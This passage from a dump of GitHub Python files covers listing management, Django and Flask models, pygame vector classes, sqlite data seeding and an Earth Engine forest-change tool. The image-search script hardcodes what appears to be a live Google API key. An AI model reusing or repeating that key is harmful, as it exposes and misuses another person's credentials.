__init__(self, fname='', lname='', user_id='', user_pin='', phone_no=''):\n        super().__init__(fname, lname, user_id, user_pin, phone_no)\n        self.houses = []\n\n# this method prints the houses that belong to a particular agent\n    def get_house(self, user_ID):\n        # the `found` flag records whether any house matched the given id; it stays 0 when\n        # nothing is found so the user can be told they have no house\n        found = 0\n        count = 0\n        with open(\"houses1.csv\", \"r\") as acsvfile:\n            reader = csv.DictReader(acsvfile)\n            # iterate through the file, checking whether the agent id in each row matches the\n            # id that was provided; every matching house is printed\n            for row in reader:\n                if row['Agent_id'] == str(user_ID):\n                    count += 1\n                    found += 1\n                    print(\n                        f\"House ID: {row['house_id']}, Number of rooms: {row['room_no']}, Location: {row['location']},\"\n                        f\" Price: {row['price']}, Your Phone Number: {row['agents_no']}\")\n\n        if found == 0:\n            print(\"You don't have any house\")\n        return found\n
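\n# Hedged usage sketch (editor's addition, not in the original repo): assuming a\n# houses1.csv with columns Agent_id, house_id, room_no, location, price, agents_no,\n# an agent's listings could be printed with:\n#   agent = Agents(fname='Ada', user_id='3')\n#   agent.get_house(3)  # prints the matching rows and returns the found flag\n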
\n# this method lets an agent add a house, passing all of the house's attributes\n    def add_house(self, house_id='', no_rooms='', location='', price='', agents_number=''):\n        house_data = [house_id, no_rooms, location, price, agents_number]\n        # the new house record is kept on the agent object\n        self.houses = (house_data)\n        return self.houses[0]\n\n# this method lets the agent remove a house; the agent provides the house id that identifies it\n    def remove_house(self, user_ID, house_ID):\n        # we need to access the houses that we stored in the csv file,\n        # so we first open the file in read mode\n        file = open('houses1.csv', 'r')\n        reader = csv.reader(file)\n        # we create an empty list that will temporarily hold the houses we keep\n        list = []\n        # the user ID and the house id to remove are compared against the rows in the csv\n        # file; every row that matches is dropped, and every other row is kept\n        # the IfFound variable indicates whether the data was found in the csv file\n        IfFound = False\n        for row in reader:\n            if row[1] == str(house_ID) and row[0] == str(user_ID):\n                IfFound = True\n                print(f\"you have successfully removed house with ID: {house_ID}\")\n            else:\n                list.append(row)\n        file.close()\n\n        # if IfFound is still false, the information was not found and we say so\n        if IfFound == False:\n            print('Invalid house id or user ID')\n\n        else:  # if it is found, the file is opened again and rewritten with the rows\n            # that remained in the list after the house was removed\n\n            file = open('houses1.csv', 'w+', newline='')\n            writer = csv.writer(file)\n            writer.writerows(list)\n            file.close()\n        return IfFound\n\n\n# this method lets the agent update the price of a house, or their phone number if it changed\n    def update_house(self, user_ID, house_ID):\n        print('Type 1 to update Price\\nType 2 to update your phone number')\n        # the agent picks what they want to update\n        toUpdate = input(\"ENTER: \")\n        # the user ID is also used to check that the agent owns the row being updated\n        #user_ID = int(input(\"Enter your user ID for authentication: \"))\n        # if the user chose 1 above, the price is updated here\n        if toUpdate == '1':\n\n            # the user has to enter the house id of the house to update\n            #house_id = int(input(\"ENTER House ID: \"))\n            # the csv file is opened\n            file = open('houses1.csv', 'r')\n            reader = csv.reader(file)\n            # we create an empty list where we will temporarily store the data from the csv\n            list = []\n            # the agent id and the house id must both match,\n            # so that no other person can update the house\n            # the IfFound variable indicates whether the data is in the csv file\n            IfFound = False\n            # the for loop iterates over the rows to find the matching one\n            for row in reader:\n                if row[1] == str(house_ID) and row[0] == str(user_ID):\n                    # a row matches both the csv data and the user input, so flip the flag\n                    IfFound = True\n                    # since the row was found, ask for the new price of the house\n                    new_Price = input(\"Enter New Price: \")\n                    # the price is the fifth element of the row, accessed as shown below\n                    row[4] = new_Price\n                # we then keep the (possibly updated) row\n                list.append(row)\n            file.close()\n            if IfFound == False:\n                print('Invalid house id or user ID')\n            else:\n                file = open('houses1.csv', 'w+', newline='')\n                writer = csv.writer(file)\n                writer.writerows(list)\n                file.close()\n            return IfFound\n        elif toUpdate == '2':\n            # the csv file is opened\n            file = open('houses1.csv', 'r')\n            reader = csv.reader(file)\n            # we create an empty list where we will temporarily store the data from the csv\n            list = []\n            # the agent id must match so that no other person can update the number\n            # the IfFound variable indicates whether the data is in the csv file\n            IfFound = False\n            for row in reader:\n                # the for loop iterates over the rows to find the matching one\n                if row[0] == str(user_ID):\n                    # a row matches both the csv data and the 
user input, so flip the flag\n                    IfFound = True\n                    # since the row was found, ask for the new phone number\n                    new_Number = input(\"Enter New Number: \")\n                    # the number is the sixth element of the row, accessed as shown below\n                    row[5] = new_Number\n                # we then keep the (possibly updated) row\n                list.append(row)\n            file.close()\n            # if the data was not found, the statement below is printed\n            if IfFound == False:\n                print('Invalid user ID or check if you have houses')\n            else:\n                # if the row was found, the file is opened again and the updated\n                # information is written back to the csv file\n                file = open('houses1.csv', 'w+', newline='')\n                writer = csv.writer(file)\n                writer.writerows(list)\n                file.close()\n            return IfFound\n        else:\n            print(\"Wrong input\")\n\n\n    # this method displays an agent's information; it fetches the data from the csv file\n    # that stored the agent objects when they were created\n    def get_User_Info(self, user_PIN):\n        # the pin is used to fetch the information of that particular agent\n\n        count = 0\n        # the csv file is opened in read mode since we just want to view the information\n        found = 0\n        with open(\"agents1.csv\", \"r\") as acsvfile:\n            reader = csv.DictReader(acsvfile)\n            # the for loop iterates over the data\n            for row in reader:\n                # if a row matches the agent's input, the agent's information is printed\n                if row['user_pin'] == str(user_PIN):\n                    found = 1\n                    print(f\"Your info:\\nuser_id:{row['user_id']}\\nfirst_name:{row['user_fname']}\\nlname:{row['user_lname']}\\nphone_no:{row['user_phone_no']}\")\n                    count += 1\n            if found == 0:\n                print(\"Your user ID is incorrect, check your user ID\")\n            return found\n","repo_name":"kiplangatmike/Find-Your-House-App","sub_path":"module/summative_users_parents_class.py","file_name":"summative_users_parents_class.py","file_ext":"py","file_size_in_byte":9735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10564137535","text":" # -*- coding: utf-8 -*-\n\nimport re\nfrom django.contrib.auth.models import User\nfrom openid.consumer.consumer import SUCCESS\n#from django.core.mail import mail_admins\n\n\nclass OpenIDBackend:\n    def authenticate(self, openid_response):\n        if openid_response is None:\n            return None\n\n        if openid_response.status != SUCCESS:\n            return None\n\n        email = openid_response.getSigned('http://openid.net/srv/ax/1.0', 'value.email')\n        first_name = openid_response.getSigned('http://openid.net/srv/ax/1.0', 'value.firstname')\n        last_name = openid_response.getSigned('http://openid.net/srv/ax/1.0', 'value.lastname')\n        username = re.findall(r'^(.+?)@', email)[0]\n\n        try:\n            user = User.objects.get(email=email)\n\n        except User.DoesNotExist:\n            user = User.objects.create_user(username, email)\n            user.first_name = first_name\n            user.last_name = last_name\n            user.save()\n\n        return user\n\n    def get_user(self, user_id):\n        try:\n            return User.objects.get(pk=user_id)\n        except User.DoesNotExist:\n            return None\n","repo_name":"perenecabuto/contas","sub_path":"possessions/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33440847202","text":"from marshmallow import fields\n\nfrom todo.extension import database, marshmallow\nfrom todo.validators.common import cannot_be_empty\nfrom todo.validators.task import 
is_in_allowed_priority_range\n\n\nclass Task(database.Model):\n __tablename__ = 'tasks'\n\n id = database.Column(database.Integer, primary_key=True)\n user_id = database.Column(database.Integer,\n database.ForeignKey(\n 'users.id',\n ondelete='CASCADE'\n ),\n nullable=False)\n title = database.Column(database.String, nullable=False)\n description = database.Column(database.String, nullable=True)\n priority = database.Column(database.Integer, nullable=False)\n add_time = database.Column(database.DateTime, nullable=False)\n active = database.Column(database.Boolean, default=True)\n\n\nclass TaskSchema(marshmallow.Schema):\n id = fields.Integer(dump_only=True)\n user_id = fields.Integer(validate=[cannot_be_empty])\n title = fields.String(validate=[cannot_be_empty])\n description = fields.String()\n priority = fields.Integer(validate=[is_in_allowed_priority_range])\n add_time = fields.DateTime(dump_only=True)\n active = fields.Boolean(default=True)\n\n\ntask_schema = TaskSchema()\ntasks_schema = TaskSchema(many=True)\n","repo_name":"NorbertOzga/flask_todo_app","sub_path":"todo/models/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25048977850","text":"with open(\"data.txt\", \"r\") as f:\n d = f.readlines()\nd = [i.replace('\\n','') for i in d]\nd = ''.join(d)\n\n\nwith open(\"clock.txt\", \"r\") as f:\n c = f.readlines()\nc = [i.replace('\\n','') for i in c]\nc = ''.join(c)\n\n","repo_name":"DRSOQUA/manualTransmission-complete","sub_path":"experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26044681342","text":"from django.template import Library\nfrom django.utils.safestring import mark_safe\n\nregister = Library()\n\n\n@register.simple_tag()\ndef render_stars(stars):\n if int(stars) == 0:\n return \"\"\n full_stars = '' * int(stars)\n half_star = (\n '' if stars % 1 == 0.5 else \"\"\n )\n return mark_safe(\n '
    {}{}
    '.format(full_stars, half_star)\n    )\n","repo_name":"EduardoZepeda/django-gis-coffee","sub_path":"shops/templatetags/render_stars.py","file_name":"render_stars.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42802856891","text":"import urllib.request\n\nfrom googleapiclient import discovery\nfrom PIL import Image\n\n\nclass ImageSearch(object):\n    CUSTOM_SEARCH_API = 'AIzaSyBFoF4sDsSj6FV8O-cYsyHbU9stfIrACJg'\n    MENU_PICTURE_CSE = '000057874177480001711:2ywzhtb3u6q'\n\n    def __init__(self):\n        self.service = discovery.build('customsearch',\n                                       'v1',\n                                       developerKey=self.CUSTOM_SEARCH_API)\n\n    def Search(self, text, num=5):\n        response = self.service.cse().list(q=text,\n                                           cx=self.MENU_PICTURE_CSE,\n                                           searchType='image',\n                                           safe='high',\n                                           num=num).execute()\n        image_link_list = []\n        if not response or 'items' not in response:\n            return None\n\n        for item in response['items']:\n            if 'link' in item:\n                image_link_list.append(item['link'])\n\n        return image_link_list\n\n\ndef main():\n    num = 5\n    thumbnail_size = (400, 300)\n    background = Image.new('RGBA', (thumbnail_size[0], thumbnail_size[1] * num),\n                           (255, 255, 255, 255))\n    image_search = ImageSearch()\n    image_link_list = image_search.Search('grilled steak', num=num)\n    for i, image_link in enumerate(image_link_list):\n        tmp_image_file = '/tmp/img%d' % i\n        # urlretrieve lives in urllib.request on Python 3\n        urllib.request.urlretrieve(image_link, tmp_image_file)\n        im = Image.open(tmp_image_file)\n        im.thumbnail(thumbnail_size)\n        offset = (0, thumbnail_size[1] * i)\n        background.paste(im, offset)\n    background.show()\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"wenjiesha/menu_picture","sub_path":"python/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9096581139","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: enfantbenidedieu\n\"\"\"\nimport setuptools\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n    long_description = fh.read()\n\nsetuptools.setup(\n    name=\"scientistmetrics\", \n    version=\"0.0.3\",\n    author=\"Duverier DJIFACK ZEBAZE\",\n    author_email=\"duverierdjifack@gmail.com\",\n    description=\"Python package for metrics and scoring : quantifying the quality of predictions\",\n    long_description=long_description,\n    long_description_content_type=\"text/markdown\",\n    url=\"https://github.com/enfantbenidedieu/scientistmetrics\",\n    packages=setuptools.find_packages(),\n    classifiers=[\n        \"Programming Language :: Python :: 3\",\n        \"License :: OSI Approved :: MIT License\",\n        \"Operating System :: OS Independent\",\n    ],\n    python_requires='>=3.10',\n)","repo_name":"enfantbenidedieu/scientistmetrics","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26625855935","text":"import sqlite3\nimport random\n\n\ndef gerar_cod_funcionarios():\n    return random.randint(1, 11)\n\n\n# function to generate a random CPF --\ndef gerar_cpf():\n    return random.randint(100_000_000, 999_999_999)\n\n\n# function to generate a random RG --\ndef gerar_rg():\n    return random.randint(10_000_000, 99_999_999)\n\n\n# generates a random birth year --\ndef gerar_data_nascimento():\n    return random.randint(1970, 2005)\n\n\n# generates a random postal code (CEP) --\ndef gerar_cep():\n    return random.randint(10000, 99999)\n\n\n# generates a random phone number --\ndef gerar_telefone():\n    return random.randint(900000000, 999999999)\n\n\n# generates a random department code\ndef gerar_cod_departamento():\n    return random.randint(1, 5)\n\n\n# picks a random job title --\ndef gerar_funcoes():\n    funcoes = [\"Analista\", \"Desenvolvedor\", \"Gerente\", \"Coordenador\", \"Assistente\"]\n    return random.choice(funcoes)\n\n\n# generates a random salary --\ndef gerar_salario():\n    return random.randint(3000, 10000)\n\n\n# creates the \"Funcionarios\" table in the database --\ndef criar_tabela_funcionario():\n    banco = sqlite3.connect(\"dados_funcionarios.db\")\n\n    cursor = banco.cursor()\n\n    cursor.execute(\"\"\"CREATE TABLE Funcionarios(\n                   cod_funcionarios INTEGER PRIMARY KEY NOT NULL,\n                   primeiro_nome VARCHAR NOT NULL,\n                   ultimo_nome VARCHAR NOT NULL,\n                   data_nasci INTEGER NOT NULL,\n                   CPF INTEGER NOT NULL,\n                   RG INTEGER NOT NULL,\n                   Endereco VARCHAR NOT NULL,\n                   CEP INTEGER NOT NULL,\n                   cidade VARCHAR NOT NULL,\n                   fone INTEGER NOT NULL,\n                   Cod_depart INTEGER NOT NULL,\n                   funcao VARCHAR NOT NULL,\n                   salario INTEGER NOT NULL\n                   )\"\"\")\n\n    banco.commit()\n\n\n# inserts the data into the table\ndef inserir_dados_no_banco():\n    banco = sqlite3.connect(\"dados_funcionarios.db\")\n    cursor = banco.cursor()\n\n    for i in range(1, 11):  # insert data for 10 employees\n        cod_funcionarios = gerar_cod_funcionarios()\n        primeiro_nome = f\"Funcionarios{i}\"\n        ultimo_nome = f\"Sobrenome{i}\"\n        data_nasci = gerar_data_nascimento()\n        cpf = gerar_cpf()\n        rg = gerar_rg()\n        endereco = f\"Endereço{i}\"\n        cep = gerar_cep()\n        cidade = f\"Cidade{i}\"\n        fone = gerar_telefone()\n        cod_depart = gerar_cod_departamento()\n        funcao = gerar_funcoes()\n        salario = gerar_salario()\n\n        cursor.execute(\"\"\"INSERT INTO Funcionarios (cod_funcionarios, primeiro_nome, ultimo_nome, data_nasci, CPF, RG,\n                       Endereco, CEP, cidade, fone, Cod_depart, funcao, salario)\n                       VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?)\"\"\",\n                       (\n                           cod_funcionarios, primeiro_nome, ultimo_nome, data_nasci, cpf, rg, endereco, cep,\n                           cidade, fone, cod_depart, funcao, salario))\n\n    banco.commit()\n\n\n# run the functions that create the table and insert the data\ncriar_tabela_funcionario()\ninserir_dados_no_banco()\n
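\n\n# Hedged check (editor's addition, not in the original script): read a few rows\n# back with the same parameterized-query style to confirm the inserts worked:\n#   cur = sqlite3.connect(\"dados_funcionarios.db\").cursor()\n#   cur.execute(\"SELECT primeiro_nome, salario FROM Funcionarios WHERE salario > ?\", (5000,))\n#   print(cur.fetchall())\n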
\ndef criar_tabela_departamento():\n    banco = sqlite3.connect(\"dados_funcionarios.db\")\n    cursor = banco.cursor()\n\n    cursor.execute(\"\"\"CREATE TABLE Departamentos(\n                   cod_depart INTEGER PRIMARY KEY NOT NULL,\n                   nome_depart VARCHAR NOT NULL,\n                   localização VARCHAR NOT NULL,\n                   cod_funcionario_gerente INTEGER NOT NULL\n                   )\"\"\")\n\n    banco.commit()\n\n\ndef inserir_dados_departamento():\n    Departamentos = [\n        {\"nome_depart\": \"RH\", \"localização\": \"Andar 1\", \"cod_funcionario_gerente\": 1},\n        {\"nome_depart\": \"TI\", \"localização\": \"Andar 2\", \"cod_funcionario_gerente\": 2},\n        {\"nome_depart\": \"Financiero\", \"localização\": \"Andar 3\", \"cod_funcionario_gerente\": 3},\n        {\"nome_depart\": \"Vendas\", \"localização\": \"Andar 4\", \"cod_funcionario_gerente\": 5},\n        {\"nome_depart\": \"Produção\", \"localização\": \"Andar 5\", \"cod_funcionario_gerente\": 6}\n    ]\n\n    banco = sqlite3.connect(\"dados_funcionarios.db\")\n    cursor = banco.cursor()\n\n    # avoid shadowing the Departamentos list with the loop variable\n    for i, departamento in enumerate(Departamentos, start=1):\n        cursor.execute(\"\"\"INSERT INTO Departamentos(cod_depart, nome_depart, localização, cod_funcionario_gerente)\n                       VALUES (?,?,?,?)\"\"\",\n                       (i, departamento[\"nome_depart\"],\n                        departamento[\"localização\"], departamento[\"cod_funcionario_gerente\"]))\n\n    
banco.commit()\n\n\ncriar_tabela_departamento()\ninserir_dados_departamento()\n","repo_name":"Z44CK/Codes_2023","sub_path":"Estrutura de Dados/db_atividade/dados_funcionarios.py","file_name":"dados_funcionarios.py","file_ext":"py","file_size_in_byte":4602,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"24211352200","text":"import pygame as pg\nfrom . import iobjects\nfrom . import mymath\nimport math\nfrom copy import deepcopy\n\n\nclass Circle(iobjects.BaseObject):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.draw = pg.draw.ellipse\n\n\n def render(self):\n self.draw(self.screen,\n self.color,\n [self.pos.x,\n self.pos.y,\n self.width,\n self.height],\n self.border)\n\n\nclass Box(iobjects.BaseObject):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.draw = pg.draw.rect\n\n\n def render(self):\n self.draw(self.screen,\n self.color,\n [self.pos.x,\n self.pos.y,\n self.width,\n self.height],\n self.border)\n\n\nclass Line(iobjects.BaseObject):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.end_pos = iobjects.BasePosition(x=self.width, y=self.height)\n self.draw = pg.draw.line\n\n\n def render(self):\n self.draw(self.screen,\n self.color,\n [self.pos.x,\n self.pos.y,\n ],\n [self.end_pos.x,\n self.end_pos.y,\n ],\n self.border)\n\n\nclass Angle:\n def __init__(self, angle: int):\n self.angle = angle\n\n def set(self, other):\n self.angle = other\n self.__check()\n\n def copy(self):\n return deepcopy(self)\n\n def opposite(self):\n copy = self.copy()\n copy -= 180\n return copy\n\n\n def __check(self):\n while self.angle < 0 or self.angle > 360:\n\n if self.angle > 360:\n self.angle -= 360\n\n if self.angle < 0:\n self.angle = 360 - abs(self.angle)\n\n\n def __str__(self):\n return f\"Angle: {self.angle}\"\n\n\n def __add__(self, other):\n copy = self.copy()\n copy.angle += other\n copy.__check()\n return copy\n\n\n def __sub__(self, other):\n copy = self.copy()\n copy.angle -= other\n copy.__check()\n return copy\n\n\n def __mul__(self, other):\n copy = self.copy()\n copy.angle *= other\n copy.__check()\n return copy\n\n\n def __floordiv__(self, other):\n copy = self.copy()\n copy.angle //= other\n copy.__check()\n return copy\n\n\n def __truediv__(self, other):\n copy = self.copy()\n copy.angle /= other\n copy.__check()\n return copy\n\n\n def __mod__(self, other):\n copy = self.copy()\n copy.angle %= other\n copy.__check()\n return copy\n\n\nclass Vector(object):\n def __init__(self, x: int = 0, y: int = 0, length: int = 0, angle: int = 0, *a, **kw):\n self.pos = iobjects.BasePosition(x=x, y=y)\n self.end_pos = iobjects.BasePosition()\n self.length = length\n #self.angle = angle\n self.angle = Angle(angle)\n self._calc_endpoint()\n\n\n def _calc_endpoint(self):\n self.end_pos.x, self.end_pos.y = mymath.endpoint(x=self.pos.x, y=self.pos.y, length=self.length, angle=self.angle.angle)\n\n\n def copy(self):\n return self\n #return deepcopy(self)\n\n\n def update_length(self):\n self.length = mymath.length_by_points(x1=self.pos.x,\n y1=self.pos.y,\n x2=self.end_pos.x,\n y2=self.end_pos.y)\n\n\n def __add__(self, other):\n copy = self.copy()\n\n if isinstance(other, int):\n copy.length += other\n copy._calc_endpoint()\n return copy\n\n elif isinstance(other, Vector):\n other.pos.x = copy.end_pos.x\n other.pos.y = copy.end_pos.y\n other._calc_endpoint()\n\n copy.end_pos.x = other.end_pos.x\n copy.end_pos.y = other.end_pos.y\n\n 
copy.update_length()\n\n copy.angle.set(mymath.angle_by_point(x1=copy.pos.x,\n y1=copy.pos.y,\n x2=copy.end_pos.x,\n y2=copy.end_pos.y))\n\n #copy._calc_endpoint()\n return copy\n\n\n def __sub__(self, other):\n copy = self.copy()\n if isinstance(other, int):\n copy.length -= other\n copy._calc_endpoint()\n return copy\n\n elif isinstance(other, Vector):\n return copy + (-other)\n\n\n def __neg__(self):\n copy = self.copy()\n copy.pos.x, copy.end_pos.x = copy.end_pos.x, copy.pos.x\n copy.pos.y, copy.end_pos.y = copy.end_pos.y, copy.pos.y\n copy.angle = copy.angle.opposite()\n return copy\n\n\n def __mul__(self, other):\n copy = self.copy()\n if isinstance(other, int):\n copy.length *= other\n copy._calc_endpoint()\n return copy\n\n elif isinstance(other, Vector):\n raise NotImplementedError\n\n\n def __truediv__(self, other):\n copy = self.copy()\n if isinstance(other, int):\n copy.length /= other\n copy._calc_endpoint()\n return copy\n\n elif isinstance(other, Vector):\n raise NotImplementedError\n\n\n def __floordiv__(self, other):\n copy = self.copy()\n if isinstance(other, int):\n copy.length //= other\n copy._calc_endpoint()\n return copy\n\n elif isinstance(other, Vector):\n raise NotImplementedError\n\n\n def __str__(self):\n return f\"Vector: (x={self.pos.x}, y={self.pos.y},\\n\\tend x={self.end_pos.x}, end y={self.end_pos.y},\\n\\tlen={self.length}, angle={self.angle}\"\n\n\nclass VectorLine(Vector, Line):\n def __init__(self, *a, **kw):\n super(Vector, self).__init__(*a, **kw)\n super().__init__(*a, **kw)\n\n\nclass BaseSprite(iobjects.IBaseSprite):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.image = None\n\n if self.filename:\n self.image = pg.image.load(self.filename).convert_alpha()\n\n else:\n self.image = pg.Surface((self.width, self.height))\n\n self.rect = self.image.get_rect(x=self.x, y=self.y)\n\n\n def render(self):\n \"\"\"Draw object on screen\"\"\"\n self.screen.blit(self.image, self.rect)\n\n\n","repo_name":"KonnorFrik/pygame_wrap","sub_path":"base_objects.py","file_name":"base_objects.py","file_ext":"py","file_size_in_byte":6555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4329554222","text":"import time\nfrom functools import partial\n\nfrom sepal_ui import sepalwidgets as sw\nfrom sepal_ui import color as sc\nfrom sepal_ui.scripts import utils as su\nimport ipyvuetify as v\nimport ee\n\nfrom component.message import cm\nfrom component import scripts as cs\nfrom component import parameter as cp\n\nee.Initialize()\n\n\nclass LaunchTile(sw.Tile):\n def __init__(self, aoi_tile, model, result_tile):\n # gather the model objects\n self.aoi_model = aoi_tile.view.model\n self.model = model\n self.attributes = {\"id\": \"launch_tile\"}\n\n # add the result_tile map to attributes\n self.m = result_tile.m\n self.tile = result_tile\n\n # create the widgets\n mkd = sw.Markdown(cm.process_txt)\n\n # create the tile\n super().__init__(\n \"compute_widget\",\n cm.tile.launch,\n inputs=[mkd],\n btn=sw.Btn(cm.launch_btn, class_=\"mt-5\"),\n alert=sw.Alert(),\n )\n\n # link the js behaviours\n self.btn.on_event(\"click\", self._launch_fcdm)\n aoi_tile.view.observe(self._update_geometry, \"updated\")\n\n def _update_geometry(self, change):\n \"\"\"update the map widget geometry\"\"\"\n\n self.tile.save.geometry = self.aoi_model.feature_collection.geometry()\n\n return self\n\n @su.loading_button(debug=True)\n def _launch_fcdm(self, widget, event, data):\n # test all the values\n 
if not self.alert.check_input(self.aoi_model.name, cm.missing_input):\n return\n for k, val in self.model.export_data().items():\n if not (\n \"forest_mask\" in k\n or self.alert.check_input(val, cm.missing_input.format(k))\n ):\n return\n\n # read the value\n # make the difference between preselected and assets\n self.model.forest_map = (\n self.model.forest_map[\"value\"]\n if type(self.model.forest_map) == dict\n else self.model.forest_map\n )\n\n # check the validity of the forest mask\n # cs.check_forest_mask(self.model.forest_map, self.aoi_model.feature_collection)\n\n # display the aoi\n self.m.addLayer(self.aoi_model.feature_collection, {\"color\": sc.info}, \"aoi\")\n self.m.zoom_ee_object(self.aoi_model.feature_collection.geometry())\n\n # display the forest mask\n self.model.forest_mask, self.model.forest_mask_display = cs.get_forest_mask(\n self.model.forest_map,\n self.model.forest_map_year,\n self.model.treecover,\n self.aoi_model.feature_collection,\n )\n self.m.addLayer(\n self.model.forest_mask_display,\n cp.viz_forest_mask(self.model.forest_map),\n \"Forest mask\",\n )\n\n # remove all already existing fcdm layers\n for layer in self.m.layers:\n if not layer.name in [\"aoi\", \"Forest mask\", \"CartoDB.DarkMatter\"]:\n self.m.remove_layer(layer)\n\n # compute nbr\n analysis_nbr_merge = ee.ImageCollection([])\n reference_nbr_merge = ee.ImageCollection([])\n for sensor in self.model.sensors:\n # analysis period\n # data preparation\n # Calculation of single scenes of Base-NBR\n analysis = cs.get_collection(\n sensor,\n self.model.analysis_start,\n self.model.analysis_end,\n self.model.forest_map,\n self.model.forest_map_year,\n self.model.forest_mask,\n self.model.cloud_buffer,\n self.aoi_model.feature_collection,\n )\n analysis_nbr = analysis.map(partial(cs.compute_nbr, sensor=sensor))\n\n # analysis period\n # data preparation\n # Calculation of single scenes of Base-NBR\n reference = cs.get_collection(\n sensor,\n self.model.reference_start,\n self.model.reference_end,\n self.model.forest_map,\n self.model.forest_map_year,\n self.model.forest_mask,\n self.model.cloud_buffer,\n self.aoi_model.feature_collection,\n )\n\n # current landsat 7/8 products are deprecated. It happens after\n # last_date = {\n # \"landsat 4\": {\"toa\": \"1993-02-14\", \"sr\": \"1993-02-14\"},\n # \"landsat 5\": {\"toa\": \"2011-05-24\", \"sr\": \"2011-05-24\"},\n # \"landsat 7\": {\"toa\": \"2021-12-30\", \"sr\": \"2021-12-30\"},\n # \"landsat 8\": {\"toa\": \"2021-12-29\", \"sr\": \"2021-12-29\"},\n # \"sentinel 2\": {\"toa\": \"2023-07-10\", \"sr\": \"2023-07-10\"},\n # }\n\n # Raise an error if reference and analysis collections are empty\n if not all([reference.size().getInfo(), analysis.size().getInfo()]):\n raise Exception(\n \"Product not available for the selected period. 
Please use a previous date.\"\n )\n\n reference_nbr = reference.map(partial(cs.compute_nbr, sensor=sensor))\n\n # adjust with kernel\n reference_nbr = reference_nbr.map(\n partial(cs.adjustment_kernel, kernel_size=self.model.kernel_radius)\n )\n analysis_nbr = analysis_nbr.map(\n partial(cs.adjustment_kernel, kernel_size=self.model.kernel_radius)\n )\n\n analysis_nbr_merge = analysis_nbr_merge.merge(analysis_nbr)\n reference_nbr_merge = reference_nbr_merge.merge(reference_nbr)\n\n # Capping of self-referenced single Second-NBR scenes at 0 and -1\n # Condensation of all available self-referenced single Second-NBR scenes per investigation period\n analysis_nbr_norm_min = analysis_nbr_merge.map(cs.capping).qualityMosaic(\"NBR\")\n\n reference_nbr_norm_min = reference_nbr_merge.map(cs.capping).qualityMosaic(\n \"NBR\"\n )\n\n # save the differents layer to download\n datasets = {\"forest mask\": self.model.forest_mask}\n datasets[\"Reference rNBR\"] = reference_nbr_norm_min.select(\"NBR\", \"yearday\")\n datasets[\"Analysis rNBR\"] = analysis_nbr_norm_min.select(\"NBR\", \"yearday\")\n\n # Derive the Delta-NBR result\n nbr_diff = analysis_nbr_norm_min.select(\"NBR\").subtract(\n reference_nbr_norm_min.select(\"NBR\")\n )\n nbr_diff_capped = nbr_diff.select(\"NBR\").where(nbr_diff.select(\"NBR\").lt(0), 0)\n datasets[\"Delta rNBR without DDR filtering\"] = nbr_diff_capped.addBands(\n analysis_nbr_norm_min.select(\"yearday\")\n ).select(\"NBR\", \"yearday\")\n\n # apply the DDR filtering\n nbr_diff_ddr = cs.ddr_filter(\n nbr_diff_capped.select(\"NBR\"),\n self.model.filter_threshod,\n self.model.filter_radius,\n self.model.cleaning_offset,\n )\n datasets[\"Delta rNBR\"] = nbr_diff_ddr.addBands(\n analysis_nbr_norm_min.select(\"yearday\")\n ).select(\"NBR\", \"yearday\")\n\n # debug purpose. 
Save the datasets to the element model\n        self.test_datasets = datasets\n\n        self.m.addLayer(\n            nbr_diff_ddr.select(\"NBR\"),\n            {\"min\": [0], \"max\": [0.3], \"palette\": \"D3D3D3,Ce0f0f\"},\n            \"Delta-rNBR\",\n        )\n\n        # add the selected datasets to the export control\n        self.tile.save.set_data(datasets)\n        self.tile.save.set_prefix(\n            self.model.reference_start[:4],\n            self.model.reference_end[:4],\n            self.model.analysis_start[:4],\n            self.model.analysis_end[:4],\n            self.aoi_model.name,\n        )\n\n        # preselect delta-rNBR\n        self.tile.save.w_datasets.v_model = [\"Delta rNBR\"]\n\n        # give feedback to the user\n        self.alert.add_live_msg(cm.complete, \"success\")\n\n        return\n","repo_name":"sepal-contrib/fcdm","sub_path":"component/tile/launch_tile.py","file_name":"launch_tile.py","file_ext":"py","file_size_in_byte":7874,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17243829862","text":"\n# Online Python - IDE, Editor, Compiler, Interpreter\n\ndef list_concat(lists):\n    \"\"\"\n    Joins the given list of lists into a single list\n    \"\"\"\n    final_list = []\n    for sublist in lists:\n        final_list.extend(sublist)\n    return final_list\n\na = [[1,2,3], [4,5,6], [7,8,9], [10]]\nprint(list_concat(a))\n\n# Output: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n","repo_name":"sanneabhilash/ineuron_datasciencemasters","sub_path":"assignments/python/functions/5.list_concat.py","file_name":"5.list_concat.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} 